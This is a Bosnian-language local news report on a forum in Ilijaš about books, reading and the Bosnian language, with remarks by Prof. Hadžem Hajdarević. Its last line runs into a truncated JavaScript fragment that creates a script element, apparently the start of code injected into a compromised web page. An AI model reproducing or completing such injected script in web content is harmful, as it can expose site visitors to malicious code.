U Ilijašu održana tribina o važnosti knjige, čitanja i bosanskog jezika

U organizaciji BZK “Preporod” Ilijaš i Instituta za jezik večeras je u izuzetno posjećenoj sali Općinskog vijeća Ilijaš održana tribina o važnosti jezika, važnosti knjige i pisane riječi za identitet i prosvjećenost jednog naroda.

Na početku tribine prisutnima se obratio Adem Alić, predsjednik BZK “Preporod” Ilijaš koji je kazao da je želja organizatora u oktobru-mjesecu knjige skrenuti pažnju na knjige i njihov značaj u obrazovanju i svakodnevnom životu čovjeka.

Gosti, predavači, bili su  prof. Hadžem Hajdarević govorio je o  Iskustvu knjige u tradiciji Bošnjaka, prof. Haris Ćatović izlagao je o Tragovima starine – kontinuitetu pismenosti na bosanskom jeziku i dr.sc. Jasmin Hodžić govorio je o knjigama iz savremene bosnistike.

Profesor Hadžem Hajdarević za Radio Ilijaš je kazao da je odnos prema knjizi zapravo odnos prema samom sebi, svojoj svijesti i onome što nosimo u svome biću.

Kako kaže stara mudrost-nije bitno koliko knjiga košta bitno je koliko će nas koštati ako je ne pročitamo. Važno je znati razabrati i imati intelektualni softver koji će nam pomoći u odabiru. Ljubav prema knjizi i kultura čitanja razvija se kod djece već u porodici, u školi i tu je važna mjera, a ne da se kod mladih  razvije otpor prema knjizi. Današnji napadi na jezik su politički motivirani, napad na jezik je napad na identitet, na srčiku i fundament bića. To je smiješno, ali se mora ozbiljno shvatiti, to su fašistički repovi još od Drugog svjetskog rata i posljednjeg rata i ta retorika je nastavak agresije, kazao je profesor Hajdarević.U toku tribine prezentirane su važne naučne činjenice o stoljećima dugoj tradiciji bosanskog jezika, o pisanim tragovima njegovog izučavanja u svim periodima historije BiH od Humskih ploča, Kulina bana i drugih tragova, o današnjem bogatstvu jezika koji ima više od 100 napisanih rječnika, pet gramatika i svoje pravopise, kao i vrijedne lingviste i naučnike; tako da bosanskom jeziku niko ne može osporavati postojanje.

BZK “Preporod” Ilijaš najavio je održavanje još jedne tribine za 20. oktobar u našem gradu na kojoj će gosti biti profesori Hadžem Hajdarević i Senadin Lavić, a posvećena je sjećanju na akademika Nedžada Ibrišimovića.var d=document;var s=d.createElement(‘script’);